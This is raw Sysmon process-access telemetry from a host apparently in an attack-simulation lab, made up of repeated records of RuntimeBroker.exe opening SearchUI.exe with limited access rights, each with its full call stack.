13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000011513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 